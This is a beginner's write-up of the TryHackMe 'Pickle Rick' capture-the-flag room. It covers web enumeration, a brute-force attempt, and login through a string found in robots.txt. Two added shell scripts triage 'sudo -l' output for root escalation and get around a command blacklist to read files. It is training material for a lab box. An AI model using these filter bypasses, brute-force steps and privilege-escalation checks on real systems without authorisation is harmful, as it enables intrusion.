TryHackMe.com is a free online platform for learning cyber security, using hands-on exercises and labs, all through your browser!
TryHackMe is extremely addictive and lots of fun, even for a n00b like me. You learn a lot of InfoSec stuff and it's a bit gamified. The community is kind and helpful. Some of the juicier stuff is paywalled, which sucks, but I'm having a great time working my way through all of the free rooms.
What follows is my attempt at a painfully honest writeup of the CTF room Pickle Rick. My plan is to complete all of the (easy) rooms, but I will only publish writeups of the ones I find particularly enjoyable and interesting. By the way, I solve TryHackMe challenges in a plain Kali Linux VM.
This Rick and Morty-themed challenge requires you to exploit a web server to find 3 ingredients that will help Rick make his potion to transform himself back into a human from a pickle.
I've never seen an episode of Rick and Morty in my life, so I was afraid this room would require you to understand references to the show, but let's give it a try.
- We start with an IP address. From the description of the room we would assume there's a web server running on port 80, and nmap confirms that this is indeed the case.
- We open the IP address in Firefox to examine the web server.
- Viewing the source of the page gives us a username right off the bat, so this looks promising.
- nmap also showed that there's an SSH server running. I tried to brute force the SSH server using Hydra with the obtained username, but unfortunately the server doesn't allow password authentication. Back to the web server.
- There is an image on the front page. Looking at where the picture is coming from, we find a directory named /assets. Inspecting this directory we find some information, including the Ubuntu version. Are there any more exposed directories to examine? Let's find out. Running DirBuster against the web server with /usr/share/dirbuster/wordlists/directory-list-2.3-small.txt lets us find the login page. I guess one should have been able to guess it, but I'm lazy.
- At this point I was stuck for a while. I tried some very basic SQL injections, searched exploit-db.com for a relevant Ubuntu exploit and tried to brute force the login via Burp Suite using lists of common passwords, but no luck.
- I finally asked for a hint on Discord and someone advised me to look in /assets. This yielded nothing but made me rethink my approach to the problem. Back to basics. I had a proper look at the output from DirBuster. There were things I hadn't looked into because I assumed they were not relevant, for example /icons and /robots.txt. The latter contains a suspicious string.
- Logging in with username:suspicious string works. I'M IN!
- Upon login we are greeted with a command panel. Trying to click around to other pages, we are denied access, apparently because "only the real REAL rick can view this page..". However, looking at the source we find yet another long mysterious string.
- The command panel is a shell, and whoami tells us that we are 'www-data', as expected. Taking a quick look in the current directory we find the first ingredient! But cat is disabled, and so are head, tail, more, less and every other command I could think of. Surely there is a way around this. We are in /var/www/html/, the web root, so after checking with ls -l filename that we have read permissions we can simply read the file in the web browser. Success!
- For the second ingredient I went the extremely lazy route of executing find / in the shell and then doing a Ctrl+F search in the browser for Ingred. Sure enough, we got a match in the home directory of a certain user, the one whose name we used for the PHP login. But how to access it? The first trick will not work in this situation, since the file is outside the web root. I assumed the long random string found earlier might be the password of this user on the machine, so I tried piping it to sudo in different ways, but I never got it to work. I also tried creating a link to it. Luckily we have read permissions on the file.
- I was stuck again, so I paused and did some research on commands that print file contents and found strings. I had never even heard of it before. strings /home/user/file. BAM!
- The third ingredient was easy to find. sudo -l gives us the following:

  ```
  Matching Defaults entries for www-data on ip-10-10-X-X.eu-west-1.compute.internal:
      env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

  User www-data may run the following commands on ip-10-10-31-147.eu-west-1.compute.internal:
      (ALL) NOPASSWD: ALL
  ```
- In other words, we can sudo all we want without having to provide a password. How convenient! Let's have a look in /root by executing sudo ls /root, and yes, there is something interesting there. Using the strings command again (via sudo this time, since www-data cannot read /root on its own) we find the third ingredient and can help Pickle Rick make his potion so he can transform himself back into a human. Mission complete.
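The sudo -l result above is the simplest possible outcome, but on most boxes the NOPASSWD line names one or two specific binaries rather than ALL, and the useful skill is telling the two cases apart quickly. The shell functions below are an added example, not part of the original writeup: they read a saved sudo -l listing on stdin, pull out the rule lines and the NOPASSWD commands, and say whether the rules amount to an unrestricted root shell. Both listings embedded in the block are constructed samples (the first is the output quoted above with the hostname redacted, the second a made-up restricted rule set), and the usage line `sudo -l 2>/dev/null | sudo_triage` is an assumption about how you would run it on a target.

```shell
#!/bin/sh
# Added example, not part of the original writeup: triage the output of "sudo -l".
# The functions read the listing on stdin so they can be tested on a saved copy;
# on a target you would run:  sudo -l 2>/dev/null | sudo_triage

# Constructed sample input: the rules from the writeup above (hostname redacted).
SAMPLE_SUDO_L='Matching Defaults entries for www-data on ip-10-10-X-X.eu-west-1.compute.internal:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on ip-10-10-X-X.eu-west-1.compute.internal:
    (ALL) NOPASSWD: ALL'

# Second constructed sample: the restricted kind of rule most boxes actually give you.
SAMPLE_SUDO_L_LIMITED='User www-data may run the following commands on box:
    (root) NOPASSWD: /usr/bin/find
    (ALL) /usr/bin/less'

# Print just the rule lines: everything after the "may run the following commands"
# header, with leading whitespace stripped and blank lines dropped.
sudo_rules() {
    awk '/may run the following commands/ { in_rules = 1; next }
         in_rules && NF { sub(/^[ \t]+/, ""); print }'
}

# Print the command part of every rule carrying the NOPASSWD tag, one per line.
sudo_nopasswd_cmds() {
    sudo_rules | sed -n 's/.*NOPASSWD:[[:space:]]*//p'
}

# Succeed (exit 0) when a NOPASSWD rule lets us run ALL commands as root, i.e. the
# runas spec is "(ALL)", "(ALL : ALL)" or "(root)" and the command list is ALL.
sudo_is_unrestricted() {
    sudo_rules | grep -Eq '^\((ALL|root)([[:space:]]*:[[:space:]]*[^)]*)?\)[[:space:]]+NOPASSWD:[[:space:]]*ALL[[:space:]]*$'
}

# One-line verdict for a sudo -l listing read from stdin.
# Exit status: 0 = unrestricted root, 1 = some NOPASSWD commands, 2 = none.
sudo_triage() {
    listing=$(cat)
    if printf '%s\n' "$listing" | sudo_is_unrestricted; then
        echo 'root: unrestricted NOPASSWD sudo, run "sudo -i" (or "sudo su -") for a root shell'
        return 0
    fi
    cmds=$(printf '%s\n' "$listing" | sudo_nopasswd_cmds)
    if [ -n "$cmds" ]; then
        # Each of these is a candidate for a GTFOBins-style escape; check them one by one.
        echo "limited: NOPASSWD commands: $(printf '%s' "$cmds" | tr '\n' ' ')"
        return 1
    fi
    echo 'none: no NOPASSWD rules'
    return 2
}
```

With (ALL) NOPASSWD: ALL there is no need to prefix every command with sudo as the writeup does: `sudo -i` or `sudo su -` gives a root shell directly. With a restricted rule, each listed command is a separate question (can this binary spawn a shell, read or write arbitrary files?), which is what the per-command output is for.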
- I need to try hard not to overthink things or assume the intended solution is hard. If a challenge is marked as easy, then it probably is easy.
- I should examine everything I find very carefully and not assume something is not useful, e.g. robots.txt.
- Not everything found is useful. I never found a use for that second weird string.
- Strings ftw!
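For the "cat is disabled" step above and the strings lesson, here is an added example (mine, not the writeup's) of dealing with a command filter that blacklists the obvious file-reading commands. The run_filtered function is a constructed stand-in for the room's command panel that refuses a command whose first word is on a blacklist; the real panel's matching rule is not documented on this page, so that is an assumption, and the sample file is constructed as well. read_file first checks readability with test -r (the same answer ls -l gives via the mode bits, in one step) and then tries a list of alternatives, strings included, until the filter lets one through.

```shell
#!/bin/sh
# Added example, not part of the original writeup: reading a file when the web
# shell's command filter blocks cat, head, tail, more and less.

# Assumed blacklist, modelled on the commands the writeup found disabled.
BLOCKED='cat head tail more less'

# Simulated command panel (an assumption about how the room's panel filters):
# run the command line unless its first word is on the blacklist.
run_filtered() {
    cmdline=$1
    first=${cmdline%% *}
    for b in $BLOCKED; do
        [ "$first" = "$b" ] && { echo "command disabled: $first" >&2; return 126; }
    done
    sh -c "$cmdline"
}

# Readable by the current user? "test -r" asks the kernel directly instead of
# eyeballing the mode bits in "ls -l".
can_read() {
    [ -r "$1" ]
}

# Alternative ways to print a file whose first word is not on the blacklist, with
# FILE standing for the path. On a plain text file they print the same thing,
# except that strings drops lines shorter than four printable characters.
ALTERNATIVES='strings FILE
tac FILE | tac
grep "" FILE
awk 1 FILE
sed -n p FILE'

# Print the file through the first alternative the panel lets through.
read_file() {
    f=$1
    can_read "$f" || { echo "not readable: $f" >&2; return 1; }
    saved_ifs=$IFS
    IFS='
'
    for tpl in $ALTERNATIVES; do
        IFS=$saved_ifs
        cmd="${tpl%%FILE*}$f${tpl#*FILE}"
        # A missing tool (exit 127) or a blocked one (126) just falls through.
        if out=$(run_filtered "$cmd" 2>/dev/null); then
            printf '%s\n' "$out"
            return 0
        fi
    done
    IFS=$saved_ifs
    echo "no working alternative for $f" >&2
    return 1
}

# Constructed stand-in for the ingredient file; prints the path of a temp file.
make_sample_file() {
    f=$(mktemp) || return 1
    printf 'first ingredient: constructed sample text\nsecond line of the same file\n' > "$f"
    echo "$f"
}
```

Note what strings actually does: it prints runs of at least four printable characters and stops at newlines, so on a text file you get each line back, but anything shorter than four characters is silently dropped; the grep, awk and sed forms print the file verbatim, and tac piped into tac restores the original order. And if the file sits under the document root, as the first ingredient did, the simplest bypass is to fetch it over HTTP and skip the shell entirely.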